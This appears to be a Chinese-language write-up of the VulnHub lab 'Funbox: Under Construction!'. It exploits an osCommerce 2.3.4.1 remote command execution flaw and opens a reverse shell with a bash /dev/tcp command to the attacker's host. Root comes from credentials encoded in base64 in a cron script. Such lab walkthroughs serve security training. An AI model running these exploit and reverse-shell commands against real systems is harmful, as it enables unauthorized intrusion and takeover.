vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

upfine發表於2023-01-11

準備:

攻擊機:虛擬機器kali、本機win10。

靶機:Funbox: Under Construction!,下載地址:https://download.vulnhub.com/funbox/Funbox10.ova,下載後直接vbox開啟即可。

知識點:osCommerce框架漏洞、pspy64檢視定時任務、敏感資訊洩露。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

資訊收集:

透過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 172.20.10.0/24,獲得靶機地址:172.20.10.6。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

掃描下埠對應的服務:nmap -T4 -sV -p- -A 172.20.10.6,顯示開放了22、25、80、110、143埠,開啟了ssh服務、http服務、smtp服務、pop3服務、imap服務。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

目錄掃描:

使用dirsearch進行目錄掃描,發現catalog目錄和一些其他檔案、目錄資訊。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

WEB資訊收集:

訪問下web服務:http://172.20.10.6/,並檢查其原始碼資訊,但是未發現有效資訊。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

訪問下掃描出來的目錄:http://172.20.10.6/catalog,發現框架資訊:osCommerce,版本資訊:v2.3.4.1。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

那就使用searchsploit搜尋下osCommerce框架v2.3.4.1版本的漏洞資訊,發現以下命令執行漏洞。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

漏洞獲取shell:

檢視下該exp的利用方式,發現其利用方式為:python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

進行shell反彈時發現不能使用單引號字元,否則會終止rec_shell,嘗試改成雙引號成功反彈shell,命令:bash -c "bash -i >& /dev/tcp/172.20.10.7/6688 0>&1"。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

提權:

在當前目錄下的configure.php.bak檔案中發現一組賬戶和密碼:jack/yellow,但是切換該賬戶或ssh連線該賬戶均是失敗。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

上傳pspy64並執行該指令碼(賦予執行許可權:chmod +x pspy64),發現會執行:/bin/sh -c /usr/share/doc/examples/cron.sh。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

檢視下該檔案資訊,命令:cat /usr/share/doc/examples/cron.sh,發現base64加密的字串:LXUgcm9vdCAtcCByZnZiZ3QhIQ==,對該字串解密,成功獲得root賬戶資訊:root/rfvbgt!!。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

但是建立新的ssh連線,仍是無法直接連線,應該是配置中禁止了使用ssh協議+密碼進行登入,使用python升級下shell:python -c 'import pty; pty.spawn("/bin/bash")',然後切換root賬戶:su root,成功獲得root許可權。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

獲得root許可權後,在/root目錄下發現root.txt檔案,讀取該檔案成功獲取到flag值。

vulnhub靶場之FUNBOX: UNDER CONSTRUCTION!

相關文章